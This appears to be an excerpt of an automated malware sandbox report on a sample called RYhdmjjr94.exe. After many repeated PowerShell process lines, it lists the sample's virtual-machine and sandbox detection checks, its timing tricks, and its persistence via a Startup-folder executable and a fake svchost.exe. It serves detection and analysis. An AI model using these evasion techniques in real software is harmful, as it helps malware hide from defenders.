                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

                Malware Analysis System Evasion:

                Yara detected AntiVM3Show sources
                Source: Yara matchFile source: 0.0.RYhdmjjr94.exe.373b3c0.23.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.0.RYhdmjjr94.exe.38fe890.10.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.0.RYhdmjjr94.exe.38fe890.26.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.0.RYhdmjjr94.exe.5120000.16.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.0.RYhdmjjr94.exe.5120000.16.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.0.RYhdmjjr94.exe.39702c0.25.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.0.RYhdmjjr94.exe.39702c0.9.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.0.RYhdmjjr94.exe.394b5e7.24.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.0.RYhdmjjr94.exe.394b5e7.8.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.0.RYhdmjjr94.exe.39702c0.9.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.0.RYhdmjjr94.exe.5120000.31.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.0.RYhdmjjr94.exe.5120000.31.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.0.RYhdmjjr94.exe.39702c0.25.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.0.RYhdmjjr94.exe.373b3c0.7.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.0.RYhdmjjr94.exe.38fe890.10.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.0.RYhdmjjr94.exe.373b3c0.7.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.0.RYhdmjjr94.exe.38fe890.26.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.0.RYhdmjjr94.exe.373b3c0.23.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000000.398079222.00000000036C9000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000000.565866416.0000000005120000.00000004.00020000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000000.401438972.000000000388C000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000000.412228109.0000000005120000.00000004.00020000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000000.435912752.00000000036C9000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000000.461519073.000000000388C000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: RYhdmjjr94.exe PID: 4328, type: MEMORYSTR
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: RYhdmjjr94.exe, 00000000.00000000.421588081.00000000026C1000.00000004.00000001.sdmp | Binary or memory string: WINE_GET_UNIX_FILE_NAME
Source: RYhdmjjr94.exe, 00000000.00000000.421588081.00000000026C1000.00000004.00000001.sdmp | Binary or memory string: SBIEDLL.DLL
Source: RYhdmjjr94.exe, 00000000.00000000.398079222.00000000036C9000.00000004.00000001.sdmp | Binary or memory string: KERNEL32.DLL/WINE_GET_UNIX_FILE_NAMEQEMU
Source: RYhdmjjr94.exe, 00000000.00000000.398079222.00000000036C9000.00000004.00000001.sdmp | Binary or memory string: SBIEDLL.DLLUSER
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Source: C:\Users\user\Desktop\RYhdmjjr94.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\RYhdmjjr94.exe | WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\36C95A71.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\cimv2 : SELECT * FROM Win32_VideoController (2 occurrences)
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\36C95A71.exe | WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController (2 occurrences)
Source: C:\Users\Public\Documents\2FDD6624\svchost.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\cimv2 : SELECT * FROM Win32_VideoController (2 occurrences)
Source: C:\Users\Public\Documents\2FDD6624\svchost.exe | WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController (2 occurrences)
Tries to detect virtualization through RDTSC time measurements
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | RDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | RDTSC instruction interceptor: First address: 0000000000409B5E second address: 0000000000409B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\System32\svchost.exe TID: 1188 | Thread sleep time: -30000s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6716 | Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6580 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6732 | Thread sleep count: 3716 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6732 | Thread sleep count: 409 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6896 | Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6796 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6960 | Thread sleep count: 1482 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 980 | Thread sleep count: 31 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 980 | Thread sleep time: -28592453314249787s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7052 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5408 | Thread sleep time: -15679732462653109s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5680 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5612 | Thread sleep count: 1842 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4872 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2252 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1036 | Thread sleep time: -11990383647911201s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6372 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4856 | Thread sleep count: 2067 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6524 | Thread sleep time: -11068046444225724s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3884 | Thread sleep count: 116 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5232 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1884 | Thread sleep count: 2247 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6664 | Thread sleep time: -15679732462653109s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3192 | Thread sleep count: 277 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1324 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5988 | Thread sleep time: -7378697629483816s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6240 | Thread sleep time: -922337203685477s >= -30000s
